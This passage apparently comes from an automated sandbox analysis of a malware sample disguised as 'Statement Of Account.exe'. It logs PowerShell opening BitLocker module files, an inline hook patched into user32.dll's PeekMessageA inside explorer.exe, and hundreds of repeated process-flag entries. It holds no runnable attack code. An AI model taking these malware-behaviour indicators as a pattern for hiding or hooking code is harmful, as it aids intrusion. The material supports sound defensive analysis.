          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
          Modifies the prolog of user mode functions (user mode inline hooks)
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xED
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
